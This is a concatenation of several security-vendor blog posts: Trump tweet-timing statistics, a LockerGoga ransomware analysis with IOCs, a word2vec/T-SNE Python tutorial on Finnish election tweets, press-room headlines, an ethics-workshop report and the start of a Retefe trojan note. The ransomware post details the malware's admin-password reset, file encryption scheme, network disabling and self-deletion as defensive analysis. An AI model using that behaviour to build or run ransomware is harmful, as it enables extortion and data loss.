  • Data from the period after the inauguration… until a noticeable change in Trump’s Twitter habits which occurred on the weekend of March 4th/5th, 2017. More on this later.
  • All data after March 5th to present.

The following diagram shows activity based on time and day, broken down by the four time periods defined above. As you can see, the highest Twitter activity has always occurred between early and mid-afternoon. Note the almost complete lack of activity between 08:00 and 12:00. Anybody developing Twitter bots for trading purposes might want to flag any activity on this account during that time-slot as “out of band”, and worthy of closer attention.

Times of the day when @realDonaldTrump Tweets have been posted. Darker red signifies more activity.

Here’s the time of day data graphed. Notice that Trump’s daily Twitter activity pattern didn’t really change across this data set.

Twitter activity by time of day

@realDonaldTrump Twitter activity by time of day. The different colored lines represent different devices used when posting a Tweet.

Notice the last graph? This is the change of behavior I alluded to earlier. Prior to March 7th, 2017, Tweets posted via “Twitter for Android” were always in the overwhelming majority. The only other data set that shows significant iPhone usage is the election campaign period. And those Tweets can be most likely attributed to campaign staff.

So, how much did @realDonaldTrump Tweet before and after becoming POTUS?

Number of posts made to @realDonaldTrump’s account by week. The different colors represent device client used to post the Tweet.

During the run up to the 2016 elections, @realDonaldTrump’s account posted about twice as many Tweets per week as in the following months. The above graph also nicely illustrated the switch from Android to iPhone on week 10 of 2017. Here’s another graph that illustrates it.

Percent client usage across the four data sets.

Well, why did @realDonaldTrump’s account suddenly shift from Android to iPhone? It could have been something that was in the works (for security reasons). Or… it might have something to do with this Tweet.

Whatever the reason, the “schedule” remains more or less the same.

Next steps?

Perhaps we’ll build a bot of our own. It’s a work in progress, and I’ll post on this more in the future.



Articles with similar Tags
#####EOF##### Analysis of LockerGoga Ransomware | News from the Lab

Analysis of LockerGoga Ransomware

We recently observed a new ransomware variant (which our products detect as Trojan.TR/LockerGoga.qnfzd) circulating in the wild. In this post, we’ll provide some technical details of the new variant’s functionalities, as well as some Indicators of Compromise (IOCs).

Overview

Compared to other ransomware variants that use Window’s CRT library functions, this new variant relies heavily on the less commonly used Boost library. For example, instead CRT’s rename function, it uses boost::filesystem::rename. The change makes technical analysis more difficult for researchers, as it makes function identification harder.

The functionalities for file enumeration and file encryption are split into different processes. File path sharing happens using the Boost.Interprocess library, which makes it harder to analyze the processes separately.

File encryption

If we execute the sample without any arguments, it moves the executable to the %TEMP% directory with hard coded name “tgytutrc{number}.exe” and executes it with the “-m” argument (where “m” stands for “master process”):

As we can see on the screenshot, the main executable uses functions from Boost library to copy and execute the sample.

exec_from_first

first_create_process_api_monitor

The main functionality is inside the “master” process, it enumerates files on the infected system and executes child processes to encrypt files.

If we provide additional argument “-l”, the process will create “C:\\.log.txt” file and write file paths and error messages.

To parse command line arguments, the sample uses Boost.Program_options library (ref. screenshot below)

master_process

Before starting the encryption phase, the “master” process enumerates sessions and logs off from all but the current process’s session.

The process uses ProcessIdToSessionId function to get a session associated with the current process.

enum_sessions_second

This is a list of active sessions on a test machine since session “1” is the session of the process, it logs off only from session “0”:

enumerate_sessions

After that, the “master” process changes the password for all administrator accounts to “HuHuHUHoHo283283@dJD“.

I’ve created a standard user, but it only changes the password for administrator accounts:

second_changes_admin_passwords

The “master” process creates a “shared memory” using the Boost.Interprocess library and executes child processes (in the same executable) with the argument “-i SM-tgytutrc -s”, where “-i ” specifies a shared section name and “-s” stands for “slave”.

According to Wikipedia: “shared memory is memory that may be simultaneously accessed by multiple programs with an intent to provide communication among them or avoid redundant copies

On the screenshot, we see that, after changing passwords, it uses Boost library to initialize shared memory and execute child processes (“slave” processes):

change_admi_pswds_create_subProc

slave_proc

Next, the “master” process enumerates files and writes their paths (encoded with Base64) in the shared memory.

The process uses Boost::Filesystem library to query paths, files, and directories:

boost_lib_files_enum

File paths are encoded with Base64:

shared_memory

Child processes decode the data from the shared memory.
The data on the shared memory has the following structure: The first “DWORD” represents the file index, while the second one represents the size of the “base64” encoded data:

base64_encoded_from_third_

After decoding a file path, a child process generates a key/IV pair using the Crypto++ library.

OS_RNG” function uses CryptoGenRandom function from Windows, another function is from Crypto++ library to generate a random numbers:

third_generate_key_iv

Before the encryption, a “slave” process renames a file using Boost::Filesystem::rename function:

third_remove_locked_and_rename_to_lockedNext, the child process encrypts the file’s content using the Rijndael algorithm. It also appends the generated key/IV pair in an encrypted form to the end of the file. The key/IV pair is encrypted with the public key, which is embedded in the executable:

third_append_enc_key_iv

After it encrypts a file, a child process overwrites the first byte of the encoded data in shared memory with a “0” byte.

overwrite_first_byte_after_reading_filePath

Network changes

After the encryption phase, the “master” process enumerates all network interfaces and disables them.

List of active adapters on my test machine:

list_of_adapters

The “master” process disables them one by one:

disable_interfaces

Next, it deletes the executable via “.bat” file which contains commands to delete the executable and the bat file itself.

second_end_delete_

At the end it logs off the current process’s session:

second_logoff_current_session

Conclusion

Overall, the latest variant of the LockerGoga ransomware is not complex or complicated. Because it uses the Boost library and Crypto++ instead of the more common CRT library functions however, it does make it a bit more troublesome for a threat researcher to analyze the sample.

Indicators of compromise (IOCs)

SHA256:

  • C97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15

Hard coded mutexes:

  • MX-tgytutrc

Directory with malicious executables:

  • %APPDATA%\Local\Temp\tgytutrc8.exe


Articles with similar Tags
#####EOF##### NLP Analysis Of Tweets Using Word2Vec And T-SNE | News from the Lab

NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”

During the two weeks leading up to the  January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed that processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data.)

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip installed all dependencies.) Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output. I do this for two reasons. Firstly, depending on the size of your raw data, each step can take some time. Hence, if you’ve performed the step once, and saved the output, it can be loaded from disk to save time on subsequent passes. The second reason for saving each step is so that you can examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load the previously saved output from a function. If it doesn’t exist, it runs the function and then saves the output. Note also the rather odd looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ascii characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret

Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable for a list of characters to keep, since Finnish includes additional letters that aren’t part of the english alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored for the raw input data. Hence, you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    words = re.split(r'(\s+)', s)
    if len(words) > 0:
      for w in words:
        if w is not None:
          w = w.strip()
          w = w.lower()
          if w.isspace() or w == "\n" or w == "\r":
            w = None
          if len(w) < 1:
            w = None
          if w is not None:
            tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None:
          for s in stopwords:
            if token == s:
              token = None
        if token is not None:
            if re.search("^[0-9\.\-\s\/]+$", token):
              token = None
        if token is not None:
            cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq

Now we’re done with all preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor.) It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set less than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample, will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the same directory where this script was run from:

tensorboard –logdir=save_dir

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

tensorboard projector menu item

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

Tensorboard's projector view

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

And now, back to the code. One of word2vec’s most interesting functions is to find similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns num-similar words. The returned value is a list containing the queried word, and a list of similar words. ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
 return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

Next, I trim the vocabulary, and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language, (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distrubution, query them for 40 most similar words, and plot both labelled graphs of each set, and a “big plot” of that set on the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.



Articles with similar Tags
#####EOF##### F-Secure PressRoom | United Kingdom
April 1, 2019

IoT threats: same hacks, new devices

March 27, 2019

Continuous response needed to fight modern threats

March 19, 2019

F-Secure Radar wins Techconsult vulnerability management award

April 1, 2019

IoT threats: same hacks, new devices

F-Secure finds IoT threats and attacks are increasing, but rely on well-known security weaknesses

March 27, 2019

Continuous response needed to fight modern threats

F-Secure calls for more ‘response’ in managed detection and response solutions

March 19, 2019

F-Secure Radar wins Techconsult vulnerability management award

HELSINKI, Finland – March 19, 2019: Finnish cyber security company F-Secure continues to receive market recognition for their solutions, with the current win being a first for the company. The latest accolade is the Professional User Rating: Security Solutions 2019 (PUR-S) Champion Award given for Radar by German research and analyst firm Techconsult. F-Secure Radar is a PCI ASV certified, turnkey vulnerability scanning […]

March 12, 2019

Brexit-related Twitter mischief supported by global far right

F-Secure’s analysis of 24 million tweets exposes inorganic activity in Twitter’s Brexit conversations.

March 5, 2019

Attack traffic up by 32 percent in 2018

F-Secure’s research highlights increase in attacks but survey data shows companies still struggle with incident detection

February 21, 2019

F-Secure nets two AV-TEST Best Protection Awards in one go

F-Secure has won its sixth and seventh AV-TEST Institute’s Best Protection Award.

January 16, 2019

MWR InfoSecurity receives Princess Royal Training Award for Second Consecutive Year

MWR has received the Princess Royal Training Award for ongoing professional development.

December 11, 2018

Online shoppers more vulnerable to spam as the holidays inch closer

Research from F-Secure warns holiday shoppers of malicious emails disguised as delivery notifications

November 28, 2018

Multiple botnets disrupted as part of anti-fraud operation

Ad fraud ring used botnets to generate nearly 30 million dollars in fraudulent ad revenue

November 20, 2018

F-Secure boosts endpoint detection and response with unique on-demand elevate to experts

F-Secure Rapid Detection & Response backs up companies fighting intruders and helps overstretched cyber security personnel stop breaches automatically before they happen in one easy to use solution.

News from our social channels

@FSecureUKTeam

RSS Safe&Savvy Blog

  • An error has occurred; the feed is probably down. Try again later.
#####EOF##### Value-Driven Cybersecurity | News from the Lab

Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing amount of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy focused organizations. The Chatham House rule (in particular, no recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.

Tags:


Articles with similar Tags
#####EOF##### Retefe Banking Trojan Targets Both Windows And Mac Users | News from the Lab

Retefe Banking Trojan Targets Both Windows And Mac Users

Based on our telemetry, customers (mainly in the region of Switzerland and Germany) are being targeted by a Retefe banking trojan campaign which uses both Windows and macOS-based attachments. Its massive spam run started earlier this week and peaked yesterday afternoon (Helsinki time).

TrendMicro did a nice writeup on this threat earlier this week. The new campaign, which just started yesterday, made some updates on the malware payload.

Instead of having the installation strings and Onion proxy domain stored in the binary as a plain text, the authors made an effort to hide the interesting strings by XORring them with 0xFF.

Original encrypted…

…and decrypted!

